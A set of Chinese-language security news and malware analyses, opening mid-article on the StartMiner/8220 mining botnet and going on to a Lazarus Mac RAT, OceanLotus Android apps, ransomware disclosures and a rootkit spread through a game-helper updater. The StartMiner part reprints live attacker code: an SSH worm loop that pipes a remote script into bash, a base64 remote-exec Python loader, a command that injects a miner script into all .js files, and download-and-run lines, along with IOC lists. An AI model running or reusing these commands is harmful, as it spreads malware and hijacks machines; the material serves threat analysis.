攻击Linux系统使用的linx.php会执行Python脚本a.py,该脚本负责下载32位、64位Linux系统版本挖矿木马i686、x86_64,并通过命令chomd设置读、写、运行三种权限,然后运行挖矿。 i686、x86_64是由XMRig程序编译的Linux版本挖矿木马 五、组建Tsunami僵尸网络进行DDoS攻击 b.py则下载32位、64位基于Linux系统的Tsunami(海啸)僵尸网络木马x64b、x32b。 Tsunami会利用远程代码执行漏洞,扫描、定位和攻击脆弱的系统,攻击成功会会导致僵尸网络完全控制设备。Tsunami通过IRC协议与C2服务器通信,接收指令并发起HTTP、UDP类型的DDoS攻击。 六、横向移动 利用Redis未授权访问漏洞 木马用于扫描攻击的ss2.py、ss3.py经过base64编码,解码后的内容都是下载new.py执行。 new.py首先生成待攻击的IP列表IP_LIST,其中方法一位获取本机IP的A段和B段,然后依次遍历0~256,1~256组成C段和D段;方法二为随机生成10万个IP,排除内网IP地址;最后把两种方法生成的IP合并到同一个列表得到约16万个IP。 对每个IP进行6379端口(Redis服务)探测连接,如果端口开放,继续判断是否存在Redis未授权访问漏洞。 Redis在默认情况下,会绑定在0.0.0.0:6379。如果没有采取相关的安全策略会使Redis服务完全暴露在公网上。如果在没有设置密码认证(一般为空)的情况下,攻击者可以在未授权访问Redis的情况下,利用Redis自身的提供的config命令,进行文件的读写等操作,包括将自己的ssh公钥写入到目标服务器的 /root/.ssh文件夹下的authotrized_keys文件中,进而可以使用对应的私钥直接使用ssh服务登录目标服务器。 如果被扫描IP存在Redis未授权访问漏洞,通过命令将curl、wget下载执行恶意脚本hehe.sh的代码写入crontab定时任务(写入“/var/spool/cron”、“/var/spool/cron/crontabs”),每1分钟执行一次。 curl -fsSLk -max -time 40 http[:]//jukesxdbrxd.xyz/hehe.sh -o ~/.ntp || wget –quiet –no-check-certificate –timeout=40 http[:]//jukesxdbrxd.xyz/hehe.sh -o ~/.ntp SSH连接 hehe.sh继续通过基于公钥认证的SSH攻击其他机器,从/.ssh/known_hosts中获取已认证的远程主机ID,与对应的机器建立SSH连接并执行命令下载恶意脚本hehe.sh: if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b” /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘(curl -fsSL http://www.jukesxdbrxd.xyz/hehe.sh||wget -q -O- http://www.jukesxdbrxd.xyz/hehe.sh)|bash >/dev/null 2>&1 &’ & done fi for file in /home/* do if test -d $file then if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then for h in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b” $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘(curl -fsSL http://www.jukesxdbrxd.xyz/hehe.sh||wget -q -O- http://www.jukesxdbrxd.xyz/hehe.sh)|bash >/dev/null 2>&1 &’ & done fi fi done hehe.sh还会通过crontab定时任务设置持久化,定期下载自身运行。 执行base64编码的Python脚本,重新获取Python攻击代码new.py(由ss2.py、ss3.py下载)并发起新的攻击。 I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cDovL3d3dy5qdWtlc3hkYnJ4ZC54eXovc3MzLnB5Jwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz 解码: #coding: utf-8 import urllib import base64 d= ‘http://www.jukesxdbrxd.xyz/ss3.py’ try: page=base64.b64decode(urllib.urlopen(d).read()) exec(page) except: pass 挖矿木马植入 hehe.sh还会查找“.js”文件并在其中插入js挖矿木马http[:]//t.cn/EvlonFh(长链接对应https[:]//xmr.omine.org/assets/v7.js) 插入命令: find / -name ‘*.js’|xargs grep -L f4ce9|xargs sed -i ‘$a\document.write\(‘\’\<script\ src=\”http://t.cn/EvlonFh\”\>\</script\>\<script\>OMINEId\(\”61adfe72ae314d8f86532b3cd1c60bda\”,\”-1\”\)\</script\>\’\)\; js挖矿木马所属网站: 最后下载负责运行Linux平台ELF挖矿木马的shell脚本2start.jpg、3start.jpg: if [ $? -eq 0 ] then pwd else curl -s http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh wget -q -O – http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh url -s http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh get -q -O – http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh curl -s http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh wget -q -O – http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh url -s http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh get -q -O – http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh fi 2start.jpg或3start.jpg判断Linux挖矿木马kworkerdss是否存在 不存在则下载挖矿程序x、xx,以及挖矿配置文件wt.conf。 七、关联家族分析 1.代码相似性 我们取被友商划归为8220挖矿木马的Powershell脚本1.ps1与近期被友商命名为StartMiner的Powershell脚本3.ps1进行对比: 1.ps1 afd9911c85a034902cf8cca3854d4a23 (下载地址:http[:]//192.99.142.248:8220/1.ps1) 3.ps1 faf53676fa29216c14d3698ff44893c8(下载地址:http[:]//www.jukesxdbrxd.xyz/3.ps1) (注:根据木马下载核心shell脚本使用的地址http[:]//www.jukesxdbrxd.xyz/3start.jpg,www[.]jukesxdbrxd.xyz应属于StartMiner) 8220挖矿木马使用的1.ps1的主要有4个功能: 1、下载挖矿木马 2、安装计划任务执行Powershell脚本(持久化),清除旧的计划任务 3、杀死竞品挖矿木马 4、启动挖矿木马 StartMiner使用的3.ps1功能与上述1.ps1完全一致,只是在下载挖矿木马时同时下载了两个文件,因此在启动挖矿进程时也启动相应的两个,增加了通过联网端口匹配竞品挖矿进程,对清除竞品挖矿木马的文件名单进行了补充。 两者相同的清除计划任务名单: “Update service for Oracle products” “Update service for Oracle products5” “Update service for Oracle products1” “Update service for Oracle products2” “Update service for Oracle products3” “Update service for Oracle products4” “Update service for Oracle products7” “Update service for Oracle products8” “Update service for Oracle products0” “Update service for Oracle products9” “Update service for Oracle productsa” “Update service for Oracle productsc” “Update service for Oracle productsm” 两者相同的清除竞品挖矿木马进程名单: ddg.exe yam.exe miner.exe xmrig.exe nscpucnminer32.exe 1e.exe iie.exe 3.exe iee.exe ie.exe je.exe im360sd.exe iexplorer.exe imzhudongfangyu.exe 360tray.exe 360rp.exe 360rps.exe pe.exe me.exe 2.共同的C2 37.44.212.223,作为8220挖矿木马C2:http[:]//37.44.212.223/rig,作为StartMiner C2:http[:]//37.44.212.223/x 3.门罗币钱包 “8220”挖矿木马与StartMiner挖矿木马都使用了门罗币钱包: 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ StartMiner: 由steamhuby.exe(8780219e4a6eb4bd1b618aee4167be5a)释放出挖矿配置文件cfg “8220”挖矿木马:由antspywares.exe(4b5df24b5deda127966029ce0fd83897)释放出配置文件cfg 并且steamhuby.exe和antspywares.exe解密挖矿配置文件时创建相同的互斥量“4e064bee1f3860fd606a”,使用相同的密钥:”0125789244697858″。 4. FTP服务器 都使用FTP服务器提供木马下载服务。 8220挖矿木马:ftp[:]//93.174.93.149 StartMiner:ftp[:]//107.189.11.170 基于上述特点我们认为2020年初开始出现的StartMiner与2017年被曝光的“8220”挖矿木马属于同一团伙,而该团伙在近期攻击过程中已不再具有明显的“8220”端口使用的特征。近期攻击过程中偏好使用的文件名如下: PE文件: isassx.exe、steamhuby.exe、kmkww.exe、haha.exe、hue.exe、xmrig1.exe、ww.exe、ww32.exe、x.jpeg、issaasss、xmrig.exe、ww2.exe、isasss.exe、ready.exe、oity.exe、kkw2.exe、12.exe、13.exe、mess.exe ELF文件: x86_64、i686、x64b、x32b、hxx、xx、x、1.so、Kworkerdss Linux Shell脚本: 2start.jpg、3start.jpg、response.jpeg、it.sh、go、go4、go3、hehe.sh、xdd.sh、start.sh Powershell脚本: 2.ps1、3.ps1、why.ps1、why2.ps1、why3.ps1、kkmswx.ps1 Python脚本: a.py、b.py、ss2.py、ss3.py、new.py VBS脚本: app.vbs、apps.vbs、poc.vbs PHP文件: linx.php、win.php VM文件(类似于JSP): linx.vm、win,vm、win2.vm txt文件: kmkww.txt、xmr.txt、config.txt、kkmw.txt、kksw.txt IOCS Domain jukesbrxd.xyz www.jukesxdbrxd.xyz IP 107.189.11.170 104.244.75.25 23.94.24.12 104.244.74.248 37.44.212.223 URL http[:]//jukesbrxd.xyz/isassx.exe http[:]//jukesbrxd.xyz/ww.exe http[:]//www.jukesxdbrxd.xyz/steamhuby.exe http[:]//www.jukesxdbrxd.xyz/new.py http[:]//www.jukesxdbrxd.xyz/xmr.txt http[:]//jukesxdbrxd.xyz/hehe.sh http[:]//104.244.75.25/steamhuby.exe http[:]//104.244.75.25/kmkww.exe http[:]//104.244.75.25/i686 http[:]//37.44.212.223/haha.exe http[:]//37.44.212.223/hue.exe http[:]//37.44.212.223/xmrig1.exe http[:]//37.44.212.223/xdxd.txt http[:]//107.189.11.170/a.py http[:]//107.189.11.170/b.py http[:]//107.189.11.170/3.ps1 ftp[:]//107.189.11.170/kmkww.exe ftp[:]//107.189.11.170/linx.php ftp[:]//107.189.11.170/linx.vm ftp[:]//107.189.11.170/win.php ftp[:]//107.189.11.170/win.vm ftp[:]//107.189.11.170/win2.vm ftp[:]//107.189.11.170/ww.exe http[:]//107.189.11.170/x64b http[:]//107.189.11.170/x32b http[:]//185.153.180.59/isassx.exe http[:]//104.244.74.248/x86_64 http[:]//23.94.24.12/kmkww.txt MD5 MD5 病毒名 8780219e4a6eb4bd1b618aee4167be5a Win32.Trojan.Inject.Auto 3c27fc39cccfdca4c38735ba6676364c Win32.Trojan.Inject.Auto ce854dd32e1d931cd6a791b30dcd9458 Win32.Trojan.Inject.Auto 64cb1856e9698cf0457a90c07a188169 Linux.Trojan.Shell.Loni c0ab986107d80f4ddbfdb46d3426244a Linux.Trojan.Shell.Djeg 46aeb7070c73c6f66171c0f86baf9433 Win32.Risk.Bitcoinminer.Pdwo a5c7c93fa57c1fc27cde28b047c85be6 Linux.Trojan.Bitcoinminer.Lnxv afd9911c85a034902cf8cca3854d4a23 Win32.Trojan.Generic.Lscf faf53676fa29216c14d3698ff44893c8 Win32.Trojan.Agent.Auto 3d99bd4a5916308685ab16ed64265b41 Linux.Trojan.Python.Dqdx 15e503acfa91f74b7a3de96cede5bde5 Linux.Trojan.Python.Hzqc 9fe932ac3055045a46d44997a4c6d481 Linux.Trojan.Miner.Rusg c4d44eed4916675dd408ff0b3562fb1f Linux.Backdoor.Tsunami.Ejrw ee48aa6068988649e41febfa0e3b2169 Linux.Backdoor.Tsunami.Amce d4ae941c505ee53e344fb4d4c2e102b7 Win32.Trojan.Miner.Buox c915dee2be8d698a02125caf8e0e938e Linux.Exploit.Redisattack.Kiqf 1e715be740f9f484c67d50f4f5b04d95 Linux.Exploit.Redisattack.Aqmo 25b8710947639ee3572c70f49eb3a207 Win32.Trojan-downloader.Miner.Hrzc e3e156053ef2ea06ae6c7dccba4ad7bc Linux.Backdoor.Phpshell.Gnnv c28cd1fd309d31d2db9a4776651bed4d Linux.Backdoor.Phpshell.Psdk d875b62187076116b9818249d57d565f Linux.Trojan.Miner.Uqid 矿池: 37.59.162.30:5790 23.94.24.12:8080 pool.hashvault.pro:80 钱包: 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ 参考链接: 新型IoT/Linux恶意软件针对DVR攻击组成僵尸网络 https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ 疑似国内来源的“8220挖矿团伙”追踪溯源分析 https://mp.weixin.qq.com/s/oUV6iDvIrsoiQztjNVCDIA “8220团伙”最新活动分析:挖矿木马与勒索病毒共舞 https://mp.weixin.qq.com/s/CPHRAntQAflcJr_BcNnNUg 8220团伙新动向:利用Aapche Struts高危漏洞入侵,Windows、Linux双平台挖矿 https://mp.weixin.qq.com/s/sO8sXWKVWCHS6upVc_6UtQ 抗“疫”时期,谨防服务器被StartMiner趁机挖矿! https://mp.weixin.qq.com/s/4350pUlXYXTMyYEAzztwQQ
通过 Trojanized 2FA 应用程序散播 Lazarus Dacls RAT 的 Mac 新变种木马
有关研究团队最新发现了一种新的Dacls远程访问特洛伊木马(RAT)变种,它与朝鲜的Lazarus集团有关联,并且专门为Mac操作系统设计。 Dacls是2019年12月奇虎360 NetLab发现的一种针对Windows和Linux平台的全功能隐蔽远程访问特洛伊木马(RAT)。 这个Mac变种至少通过一个名为MinaOTP的木马化的macOS二元身份验证应用程序进行分发,该应用程序主要由中国用户使用。与Linux变种类似,它拥有多种功能,包括命令执行、文件管理、流量代理和蠕虫扫描。 发现 4月8日,一个名为“TiNakOTP”的可疑Mac应用程序从香港提交到VirusTotal,当时没有任何引擎检测到它。 恶意的bot可执行文件位于应用程序的“Contents/Resources/Base.lproj/”目录中,当它是Mac可执行文件时,它会伪装成nib文件(“SubMenu.nib”)。它包含字符串“c_2910.cls”和“k_3872.cls”,而这是以前检测到的证书和私钥文件的名称。 持久性 该RAT通过LaunchDaemons或LaunchAgents持久存在,它们采用属性列表(plist)文件,这个文件指定了重启后需要执行的应用程序。LaunchAgents和LaunchDaemons之间的区别在于,LaunchAgents代表登录用户运行代码,而LaunchDaemons以root用户运行代码。“ 当恶意应用程序启动时,它将在“Library/LaunchDaemons”目录下创建一个名称为“com.aex-loop.agent.plist”的plist文件,plist文件的内容在应用程序中进行了硬编码。 该程序还会检查“getpwuid( getuid() )”是否返回当前进程的用户ID。如果返回用户ID,它将在LaunchAgents目录“Library/LaunchAgents/”下创建plist文件“com.aex-loop.agent.plist”。 图1 plist文件 存储plist的文件名和目录为十六进制格式并附加在一起,它们向后显示文件名和目录。 图2 目录和文件名生成 配置文件 配置文件包含有关受害者计算机的信息,例如Puid、Pwuid、插件和C&C服务器,配置文件的内容使用AES加密算法进行加密。 图3 加载配置 Mac和Linux变种都使用相同的AES密钥和IV来加密和解密配置文件,两种变种中的AES模式均为CBC。 图4 AES密钥和IV 配置文件的位置和名称以十六进制格式存储在代码中,该配置文件名称伪装成与Apple Store相关的数据库文件:“Library/Caches/Com.apple.appstore.db”。 图5 配置文件名 “IntializeConfiguration”功能使用以下硬编码的C&C服务器初始化配置文件。 图6 初始化配置文件 通过从C&C服务器接收命令来不断更新配置文件。安装后的应用程序名称为“mina”。Mina来自MinaOTP应用程序,它是针对macOS的双因素身份验证应用程序。 图7 配置文件正在更新 主循环 初始化配置文件后,执行主循环以执行以下四个主命令: 将C&C服务器信息从配置文件上载到服务器(0x601) 从服务器下载配置文件内容并更新配置文件(0x602) 通过调用“getbasicinfo”函数(0x700)从受害者的计算机上传收集的信息 发送heartbeat信息(0x900) 命令代码与Linux.dacls完全相同。 图8 主循环 插件 此Mac-RAT拥有Linux变种中的所有六个插件,以及一个名为“SOCKS”的附加插件。这个新插件用于代理从受害者到C&C服务器的网络流量。 该应用程序会在主循环开始时加载所有七个插件。每个插件在配置文件中都有自己的配置部分,将在插件初始化时加载。 图9 加载的插件 CMD插件 cmd插件类似于Linux rat中的“bash”插件,它通过为C&C服务器提供一个反向shell来接收和执行命令。 图10 CMD插件 文件插件 文件插件具有读取、删除、下载和搜索目录中文件的功能。Mac和Linux变种之间的唯一区别是Mac变种不具有写入文件的能力(case 0)。 图11 文件插件 进程插件 进程插件具有终止、运行、获取进程ID和收集进程信息的功能。 图12 进程插件 如果可以访问进程的“ / proc /%d / task”目录,则插件将从进程获取以下信息,其中%d是进程ID: 通过执行“/ proc /%/ cmdline”获取进程的命令行参数 “/ proc /%d / status”文件中进程的名称、Uid、Gid、PPid 测试插件 Mac和Linux变种之间的测试插件的代码是相同的,它检查到C&C服务器指定的IP和端口的连接。 RP2P插件 RP2P插件是一个代理服务器,用于避免受害者与参与者的基础设施进行直接通信。 图13 反向P2P LogSend插件 Logsend插件包含三个模块: 检查与日志服务器的连接 扫描网络(蠕虫扫描仪模块) 执行长期运行的系统命令 图14 Logsend插件 该插件使用HTTP端口请求发送收集的日志。 图15 用户代理 这个插件中一个有趣的功能是蠕虫扫描程序。“start_worm_scan”可以扫描端口8291或8292上的网络子网,要扫描的子网是基于一组预定义规则确定的。下图显示了选择要扫描的子网的过程。 图16 蠕虫扫描 Socks插件 Socks插件是此Mac Rat中新增的第七个插件,它类似于RP2P插件,并充当引导bot和C&C基础结构之间通信的媒介,它使用Socks4进行代理通信。 图17 Socks4 网络通讯 此Mac-RAT使用的C&C通信与Linux变种类似,为了连接到服务器,应用程序首先建立一个TLS连接,然后执行beaconing操作,最后使用RC4算法对通过SSL发送的数据进行加密。 图18 应用程序生成的流量(.mina) 图19 TLS连接 Mac和Linux变种都使用WolfSSL库进行SSL通信,WolfSSL通过C中的TLS的开源实现,支持多个平台。这个库已被多个威胁参与者使用,例如,Tropic Trooper在其Keyboys恶意软件中使用了这个库。 图20 WolfSSL 用于beaconing的命令代码与Linux.dacls中使用的代码相同,这是为了确认bot和服务器的身份。 图21 Beaconing RC4密钥是通过使用硬编码密钥生成的。 图22 RC4初始化 变体和检测 我们还确定了此RAT的另一个变体,该变体使用以下curl命令下载恶意负载:curl -k -o〜/ Library / .mina https://loneeaglerecords.com/wpcontent/uploads/2020/01/images.tgz.001>/ dev / null 2>&1 && chmod + x〜/ Library / .mina> /dev / null 2>&1 &&〜/ Library / .mina> / dev。 我们认为,Dcals RAT的Mac变体与Lazarus小组(也称为Hidden Cobra和APT 38)有关,Lazarus小组是自2009年以来一直从事网络间谍活动和网络犯罪的臭名昭著的朝鲜恐怖组织。 据悉,该组织是最成熟的参与者之一,能够针对不同平台定制恶意软件。这个Mac-RAT的发现表明,APT小组正在不断开发其恶意软件工具集。 Mac的Malwarebytes将该远程管理木马检测为OSX-DaclsRAT。 IOCs 899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53 846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6 216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd loneeaglerecords[.]com/wp-content/uploads/2020/01/images.tgz.001 67.43.239.146 185.62.58.207 50.87.144.227 消息来源:malwarebytes, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接
海莲花(OceanLotus) APT组织滥用合法证书传播高级 Android 威胁
2014年以来,海莲花(OceanLotus)APT组织(或被称为PhantomLance)就以通过官方和第三方市场传播高级Android威胁而闻名。他们试图远程控制受感染的设备、窃取机密数据、安装应用程序并启动任意代码。 安全研究人员最近记录了该组织的活动,Bitdefender调查发现了该组织35个新的恶意样本,并证明其活动可能使用了合法且可能被盗的数字证书来对某些样本进行签名。 该APT组织的作案手法是先上传干净版本,然后添加恶意软件,然后通过Google Play和第三方市场传播恶意Android应用。 安全研究人员认为,海莲花APT组织与Android恶意软件和过去基于Windows的高级威胁的命令和控制域之间的共享基础结构相关联,这些威胁过去一直以Microsoft用户为目标。可以说,这些较早的活动也与Hacking Team组织有联系,该组曾为APT32组织服务。 虽然海莲花主要针对非洲和亚洲,但Bitdefender遥测技术还可以在日本、韩国、越南、德国和印度等国家进行扫描。 Bitdefender 检测到此威胁为 Android.Trojan.OceanLotus。 寻找“零号病人” 在Bitdefender存储库(APK MD5:315f8e3da94920248676b095786e26ad)中找到的,与海莲花APT组织所关联的最古老的样本似乎已于2014年4月首次登陆Google Play 。可追溯到最早的已知Google Play样本在2014年12月。 根据内部zip文件时间戳记,该样本构建于2014年4月5日,几天后就被我们记录下。 一个有趣的发现是,该样本已使用VL Corporation的证书进行了签名。 该证书于2013年7月生成,并且直到2014年为止,除OceanLotus Malware以外,Google Play上已有100多个不同的应用程序在使用它。这表明网络犯罪集团可能已使用有效证书成功地将恶意病毒app走私到了Google Play中。 Certificate: Data: Version: 3 (0x2) Serial Number: 2002933886 (0x7762587e) Signature Algorithm: sha256WithRSAEncryption Issuer: C=VN, ST=10000, L=HN, O=VL Corporation, OU=VL Corporation, CN=VL Corporation Validity Not Before: Jul 22 18:57:09 2013 GMT Not After : Jul 16 18:57:09 2038 GMT Subject: C=VN, ST=10000, L=HN, O=VL Corporation, OU=VL Corporation, CN=VL Corporation 他的证书很可能已被该APT组织泄漏和滥用。目前,在Google Play中使用此证书签名的100多个应用程序中,仍然没有该应用程序。 目标国家 在遥测方面,仅在过去的3个月中,我们就收到25篇涉及此威胁的报告,其中大多数是在美国、日本和韩国。显然,在美国的报告可能不是真实的设备,但亚马逊托管的Android计算机被操纵来运行样本以进行安全分析,对于安全研究人员而言,执行这种沙箱操作并不少见,特别是在尝试获取危害指标或研究恶意行为时。 但是,韩国和日本的报告确实表明,最近遇到过海莲花APT样本的设备至少数量有限。 Android OceanLotus报告威胁的十大国家 追踪传播 在传播方面,虽然安全研究人员已经报告说恶意软件的发行是通过官方的Google Play市场和第三方市场进行的,但一些与Google Play相似的市场仍在托管这些样本。这意味着,尽管Google在及时管理其应用程序并响应安全研究人员和供应商方面做得很出色,但第三方市场(如果有的话)缓慢地消除了这些威胁,甚至有可能无限期地使用户暴露于恶意软件中。 仍托管这些恶意样本的第三方市场的一些样本包括: hxxps://apkpure.com/opengl-plugin/net.vilakeyice.openglplugin hxxps://apk.support/app/net.vilakeyice.openglplugin hxxps://apkplz.net/app/com.zimice.browserturbo hxxps://apk.support/app/com.zimice.browserturbo hxxps://androidappsapk.co/download/com.techiholding.app.babycare/ hxxps://www.apkmonk.com/app/com.techiholding.app.babycare/ hxxps://apkpure.com/cham-soc-be-yeu-babycare/com.techiholding.app.babycare hxxps://apk.support/app-th/com.techiholding.app.babycare 虽然已经有了海莲花APT组织的样本完整列表,我们知道这些样本已出现在Google Play中,但我们添加了以下一些内容,这些内容也已在Google Play上得到确认。 由Bitdefender研究人员发现的海莲花APT组织的其他新样本的md5完整列表如下: 3043a2038b4cb0586f5c52d44be9127d f449cca2bc85b09e9bf4d3c4afa707b6 76265edd8c8c91ad449f9f30c02d2e0b 5d909eff600adfb5c9173305c64678e7 66d4025f4b60abdfa415ebd39dabee49 7562adab62491c021225166c7101e8a1 7b8cba0a475220cc3165a7153147aa84 63e61520febee25fb6777aaa14deeb4a 9236cf4bf1062bfc44c308c723bda7d4 f271b65fa149e0f18594dd2e831fcb30 e6363b3fae89365648b3508c414740cd d9e860e88c22f0b779b8bacef418379e 3d4373015fd5473e0af73bdb3d65fe6a a57bac46c5690a6896374c68aa44d7b3 08663152d9e9083d7be46eb2a16d374c 18577035b53cae69317c95ef2541ef94 eee6dcee1ab06a8fbb8dc234d2989126 5d07791f6f4d892655c3674d142fe12b f0ea1a4d81f8970b0a1f4d5c41f728d8 320e2283c8751851362b858ad5b7b49c 1fb9d7122107b3c048a4a201d0da54cd bb12cc42243ca325a7fe27f88f5b1e1b 01b0b1418e8fee0717cf1c5f10a6086b 4acf53c532e11ea4764a8d822ade9771 6ff1c823e98e35bb7a5091ea52969c6f 1e5213e02dd6f7152f4146e14ba7aa36 3fe46408a43259e400f7088c211a16a3 c334bade6aa52db3eccf0167a591966a 53ba3286a335807e8d2df4aae0bd0977 7f59cb904e2e0548b7f0db12c08b9e25 49d1c82a6b73551743a12faec0c9e8b1 6b323840d7cb55bb5c9287fc7b137e83 2e1ed1f4a5c9149c241856fb07b8216b 6737fba0f2b3ea392f495af9a0aa0306 bda442858c33ae7d9f80227c55f6a584 规避Google Play保护 攻击者通常向Google Play提交一个干净的版本,然后随机等待一段时间,再简单地使用恶意代码更新应用程序。网络犯罪分子似乎也使用了这种策略。 例如,应用程序net.vilakeyice.openglplugin(OpenGLPlugin)最初于 2018 年8月5 日以纯净格式上传,然后在8月21日引入了恶意payload。 APK Seen on Google Play No Payload 7285f44fa75c3c7a27bbb4870fc0cdca 2018.08.05 With Payload d924211bef188ce4c19400eccb6754da 2018.08.21 然后,将payload解密并动态加载到应用程序中。如果较旧的样本将解密密钥本地嵌入在原始的干净应用程序中,则较新的样本将不再将其存储在本地,因为它们似乎接收了解密密钥以及恶意payload。 归因和可用性 尽管这些Android恶意软件样本的归属已经成为安全行业分析的主题,但海莲花APT组织已经被标记为幕后主谋。不过样本仍存在于第三方市场这一事实应当引起注意。 某些时候Google Play上的某些样本目前仍可在第三方市场上获得, 包括在Amazon上。在世界各地可能无法从官方Google Play市场访问内容的地区,用户仍然有感染这种恶意软件的风险。 在亚马逊印度的这个特定样本中,开发人员名称为Caleb Eisenhauer(假名),该应用程序似乎已于 2020 年2月16日发布。与该帐户关联的电子邮件地址(malcesshartspur@gmail.com)发送至托管在GitHub(https://github.com/malcesshartspur)上的隐私政策。 可能存在类似的虚假开发者帐户,它们都在第三方市场上散布了各种样本,如果不删除,有可能在很长一段时间内感染受害者。 消息来源:Bitdefender, 译者:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接
越来越多上市公司已经开始将勒索软件列为前瞻性风险因素
现在越来越多的上市公司在向美国证券交易委员会提交的文件中,将赎金软件列为前瞻性风险因素。在过去的12个月里,已经有超过1000份文件提到赎金软件作为风险因素,仅2020年1月1日到现在,就有超过700份,预计今年这一数字将轻松超过2019年的数字。 目前,在向美国监管机构提交的年报(10K和20F)、季报(10Q)、特殊事件备案(8K和6K)以及向美国监管机构提交的注册表(S1)中,都会经常提到赎金软件。Alphabet、美国航空、麦当劳、Tupperware和Pluralsight等大牌公司,仅在过去两天就将赎金软件列为其业务的潜在风险。 这些申报的目的是为了告诉股东,公司很容易受到攻击,也可能成为赎金软件团伙的攻击目标,任何赎金软件的感染都可能给公司带来巨大的、不可忽视的损失。为此,2018年2月SEC发布了正式的指导意见,要求企业加强对网络安全风险的披露。该文件中提到,赎金软件攻击是需要披露的一类事件,尤其是当攻击事件被广泛报道于新闻中,预计会在当季造成明显的财务损失,并可能影响股价(股东利润)的情况下,需要披露。 如今,赎金软件犯罪团伙已经不再以家庭用户为目标,而主要是针对大型企业网络,寻求奢侈的赎金支付。现在,赎金软件团伙对大公司的追杀十分凶猛。他们攻破网络,利用专门的工具最大限度地扩大损失,在黑暗的门户网站上泄露企业信息,甚至给记者提供小道消息,为企业制造负面新闻,以报复拒绝支付的企业。 赎金软件感染的危害现在已经达到了难以想象的程度。赎金软件要求500美元解密文件的日子已经一去不复返了。根据处理赎金软件事件响应公司Coveware发布的一份报告显示,赎金软件勒索的平均解密费在11万美元左右徘徊。 (稿源:cnBeta,封面源自网络。)
UU 页游助手升级通道传播独狼 Rootkit 病毒,已感染上万台电脑
感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/MchLCxba26Z0KMZthv-uLA 一、概述 腾讯安全威胁情报中心检测发现,UU页游助手通过其软件升级通道,传播独狼Rootkit病毒。独狼Rootkit家族是一个长期依赖第三方Ghost镜像传播的恶性锁主页后门病毒。本次由于通过借助UU页游助手推广渠道流氓传播,使得独狼Rootkit病毒在短时间内感染量激增,受害网民已过万,分布在全国各地。中毒电脑会出现莫名其妙安装不请自来的软件、频繁弹出广告、浏览器主页被锁定等现象。 二、病毒分析 UU页游助手安装完毕后,会在安装目录内安装名为PopTip.exe的模块,该模块负责与hxxp://update.uuyyzs.com/query_action.php页面通信。 PopTip.exe模块负责拉取弹窗广告信息、托盘广告信息、升级信息等,例如下图中从云端拉取的Mini页信息。 由于广告窗口没有显示厂商标识,没有广告来源信息,该软件在系统托盘区闪动消息提示,点击后会自动创建桌面页游图标,这些行为令用户十分反感。而PopTip.exe模块提供的升级功能,较多使用了流氓手段恶意推广安装,其中甚至包含病毒木马文件。 PopTip.exe模块通过“虚假更新提示”的弹出框恶意推装用户不需要的软件:该窗口右上角的关闭按钮,无论如何点击均无法关闭,该弹出框强迫用户点击升级完成按钮。该窗口还默认勾选两个文字描述模糊,颜色极浅的可选项。放大图片发现分别为亿迅图片转换器和数据优化。用户点击完成,UU游戏助手则进行全程静默安装行为。 当前版本的poptip.exe模块通过以下两个地址,拉取推装程序到Roaming目录静默安装执行: hxxp://www.fikuu.com/app/YXConvert_105301.exe(亿迅图片转换器) Hxxp://www.jia7788.top:7788/new/a109.exe(数据优化服务:实际为病毒文件) a109.exe模块会判断当前系统内是否包含安全软件的进程,当进程存在则向其窗口发送WM_QUIT尝试退出相关进程,同时该模块通过拉起系统svchost.exe作为傀儡进程执行恶意代码,释放随机名的驱动程序。或下载执行xww999.exe执行释放随机名驱动程序,将独狼Rootkit模块植入到系统内。 独狼Rootkit病毒,该病毒的特点之一是通过创建Minifilter文件过滤系统,用户使用系统文件管理器就会发现Drivers目录不可见,同时将所有访问病毒驱动随机名母体文件的请求重定向到系统acpi.sys文件。意思是,当你试图查看那些莫名其妙进来的随机文件名驱动文件时,你看到的实际是acpi.sys。 独狼Rootkit模块最终通过插APC的方式向浏览器进程注入恶意代码达到主页劫持、后门代码驻留等恶意行为。 独狼rootkit病毒会向浏览器进程注入恶意代码,实现劫持浏览器启动命令行,达到主页劫持的目的。 